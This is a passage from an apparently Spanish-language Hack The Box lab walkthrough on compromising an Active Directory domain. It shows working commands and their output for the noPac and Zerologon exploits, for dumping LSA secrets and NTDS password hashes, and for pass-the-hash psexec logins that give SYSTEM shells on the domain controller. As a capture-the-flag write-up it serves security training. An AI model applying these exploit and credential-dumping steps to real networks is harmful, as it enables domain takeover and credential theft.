SMB         web.htb.local   445    WEB              dpapi_machinekey:0x83cc5011c1ab224b85fc864cc10baec5396c0fd6
dpapi_userkey:0xc86b8a5680aaf63d34bedb4433fae5a46bfe7738
SMB         web.htb.local   445    WEB              NL$KM:6985d116bea614721b726a031eb0f10a74793d88de28b1c39016961eeb10af59fa5052840c25410c7a7c85e2add3ef52ae760126e2f8047aac1302d6fd9db183
SMB         web.htb.local   445    WEB              [+] Dumped 6 LSA secrets

❯ evil-winrm -i web.htb.local -u Administrator -p Myp@ssw0rd  
PS C:\Users\Administrator\Documents> whoami
web\administrator
PS C:\Users\Administrator\Documents>

Extra 2

CVE-2021-42278 / CVE-2021-42287 - DC1 Administrator

Como alternativa podemos usar noPac donde aunque el parametro -shell no funcionará directamente si que nos creara un ticket como Administrator

❯ python3 noPac.py htb.local/bob:Passw0rd1! -use-ldap

███    ██  ██████  ██████   █████   ██████
████   ██ ██    ██ ██   ██ ██   ██ ██
██ ██  ██ ██    ██ ██████  ███████ ██
██  ██ ██ ██    ██ ██      ██   ██ ██
██   ████  ██████  ██      ██   ██  ██████

[*] Current ms-DS-MachineAccountQuota = 10
[-] Resolved Failed: The DNS query name does not exist: dc1.htb.local.
[*] Selected Target dc1.htb.local
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-WBRJLYTQFAZ$"
[*] MachineAccount "WIN-WBRJLYTQFAZ$" password = hc^Lj47SxvYl
[*] Successfully added machine account WIN-WBRJLYTQFAZ$ with password hc^Lj47SxvYl.
[*] WIN-WBRJLYTQFAZ$ object = CN=WIN-WBRJLYTQFAZ,CN=Computers,DC=htb,DC=local
[*] WIN-WBRJLYTQFAZ$ sAMAccountName == dc1
[*] Saving a DC's ticket in dc1.ccache
[*] Reseting the machine account to WIN-WBRJLYTQFAZ$
[*] Restored WIN-WBRJLYTQFAZ$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_dc1.htb.local.ccache
[*] Attempting to del a computer with the name: WIN-WBRJLYTQFAZ$
[-] Delete computer WIN-WBRJLYTQFAZ$ Failed! Maybe the current user does not have permission.  

❯ export KRB5CCNAME=Administrator_dc1.htb.local.ccache

En este punto podemos usar el ticket para autenticarnos contra la maquina y obtener una shell en el DC1 por lo que nos saltamos todas las demas maquinas

❯ impacket-psexec htb.local/Administrator@dc1.htb.local -k -no-pass  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc1.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file wYUrWrQH.exe
[*] Opening SVCManager on dc1.htb.local.....
[*] Creating service MJBV on dc1.htb.local.....
[*] Starting service MJBV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
dc1

C:\Windows\system32>

Como nos autenticamos como Administrator podemos dumpear el ntds para ver todos los hashes NT del dominio con los que podemos hacer un passthehash

❯ crackmapexec smb dc1.htb.local -k --use-kcache --ntds drsuapi
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         dc1.htb.local   445    DC1              [+] htb.local\ from ccache (Pwn3d!)
SMB         dc1.htb.local   445    DC1              [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc1.htb.local   445    DC1              Administrator:500:aad3b435b51404eeaad3b435b51404ee:e57231f8ebcc24a122631564147361cc:::
SMB         dc1.htb.local   445    DC1              Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         dc1.htb.local   445    DC1              krbtgt:502:aad3b435b51404eeaad3b435b51404ee:161950868faef1197d2dd964966fc68f:::
SMB         dc1.htb.local   445    DC1              iis-svc:1105:aad3b435b51404eeaad3b435b51404ee:98ccfeefb79abfbe15344b668c8bbafd:::
SMB         dc1.htb.local   445    DC1              test-svc:1106:aad3b435b51404eeaad3b435b51404ee:f57c975264501a6649cd4e00d3f80f13:::
SMB         dc1.htb.local   445    DC1              bob:1107:aad3b435b51404eeaad3b435b51404ee:b2bdbe60565b677dfb133866722317fd:::
SMB         dc1.htb.local   445    DC1              lee:1108:aad3b435b51404eeaad3b435b51404ee:0e5a9749302e671fec9ab329b4b880d9:::
SMB         dc1.htb.local   445    DC1              kalle:1109:aad3b435b51404eeaad3b435b51404ee:b62bdf73a5ca2e921568450ab646c6bd:::
SMB         dc1.htb.local   445    DC1              htb.local\remote_user:10601:aad3b435b51404eeaad3b435b51404ee:a37f673dc55567c22d20f2045b688846:::  
SMB         dc1.htb.local   445    DC1              WEB$:1110:aad3b435b51404eeaad3b435b51404ee:549fd7eb92d4bd6e0352991dbc6e0a7a:::
SMB         dc1.htb.local   445    DC1              DEV$:1601:aad3b435b51404eeaad3b435b51404ee:01300a3009c7ae1af0ea216ebada48ad:::
SMB         dc1.htb.local   445    DC1              DC1$:2101:aad3b435b51404eeaad3b435b51404ee:c8261e7a49e363b8dc4087d21bf603a2:::
SMB         dc1.htb.local   445    DC1              WIN-WBRJLYTQFAZ$:15106:aad3b435b51404eeaad3b435b51404ee:1a12a5d765c7a6f9fbc1f74a6bb3f6

Ya con el hash NT del Administrador del dominio podemos autenticarnos con este a cualquiera de los equipos que pertenezca al dominio y nos devolvera un Pwn3d!

❯ crackmapexec smb 192.168.3.201-203 -u Administrator -H e57231f8ebcc24a122631564147361cc -k
SMB         192.168.3.201   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:htb.local) (signing:False) (SMBv1:True)
SMB         192.168.3.202   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         192.168.3.203   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)
SMB         192.168.3.201   445    DEV              [+] htb.local\Administrator:e57231f8ebcc24a122631564147361cc (Pwn3d!)
SMB         192.168.3.202   445    WEB              [+] htb.local\Administrator:e57231f8ebcc24a122631564147361cc (Pwn3d!)
SMB         192.168.3.203   445    DC1              [+] htb.local\Administrator:e57231f8ebcc24a122631564147361cc (Pwn3d!)

Extra 3

CVE-2020-1472 - DC1 Administrator

Como alternativa podemos ejecutar la vuln de zerologon hacia el DC1, el servidor es vulnerable y logramos cambiar la contraseña del equipo por una cadena vacia

❯ python3 cve-2020-1472-exploit.py DC1 192.168.3.203
Performing authentication attempts...
==========================================================================  
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

Autenticandonos como el equipo DC1$ con una cadena vacia como contraseña podemos hacer un DCSync y ver el hash NT del usuario Administrator

❯ crackmapexec smb dc1.htb.local -u DC1$ -p '' --ntds drsuapi
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)
SMB         dc1.htb.local   445    DC1              [+] htb.local\DC1$: 
SMB         dc1.htb.local   445    DC1              [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         dc1.htb.local   445    DC1              [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc1.htb.local   445    DC1              Administrator:500:aad3b435b51404eeaad3b435b51404ee:e57231f8ebcc24a122631564147361cc:::
SMB         dc1.htb.local   445    DC1              Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         dc1.htb.local   445    DC1              krbtgt:502:aad3b435b51404eeaad3b435b51404ee:161950868faef1197d2dd964966fc68f:::
SMB         dc1.htb.local   445    DC1              iis-svc:1105:aad3b435b51404eeaad3b435b51404ee:98ccfeefb79abfbe15344b668c8bbafd:::
SMB         dc1.htb.local   445    DC1              test-svc:1106:aad3b435b51404eeaad3b435b51404ee:f57c975264501a6649cd4e00d3f80f13:::
SMB         dc1.htb.local   445    DC1              bob:1107:aad3b435b51404eeaad3b435b51404ee:b2bdbe60565b677dfb133866722317fd:::
SMB         dc1.htb.local   445    DC1              lee:1108:aad3b435b51404eeaad3b435b51404ee:0e5a9749302e671fec9ab329b4b880d9:::
SMB         dc1.htb.local   445    DC1              kalle:1109:aad3b435b51404eeaad3b435b51404ee:b62bdf73a5ca2e921568450ab646c6bd:::
SMB         dc1.htb.local   445    DC1              htb.local\remote_user:10601:aad3b435b51404eeaad3b435b51404ee:a37f673dc55567c22d20f2045b688846:::  
SMB         dc1.htb.local   445    DC1              WEB$:1110:aad3b435b51404eeaad3b435b51404ee:549fd7eb92d4bd6e0352991dbc6e0a7a:::
SMB         dc1.htb.local   445    DC1              DEV$:1601:aad3b435b51404eeaad3b435b51404ee:a2c8507703354995745e5b9ea2ac0bd1:::
SMB         dc1.htb.local   445    DC1              DC1$:2101:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Ya con el hash NT podemos conectarnos con psexec y conseguir una shell como el usuario nt authority\system directamente en el DC1 con maximos privilegios

❯ impacket-psexec htb.local/Administrator@dc1.htb.local -hashes :e57231f8ebcc24a122631564147361cc -k  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc1.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file RfyqzLYf.exe
[*] Opening SVCManager on dc1.htb.local.....
[*] Creating service IVdV on dc1.htb.local.....
[*] Starting service IVdV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
dc1

C:\Windows\system32>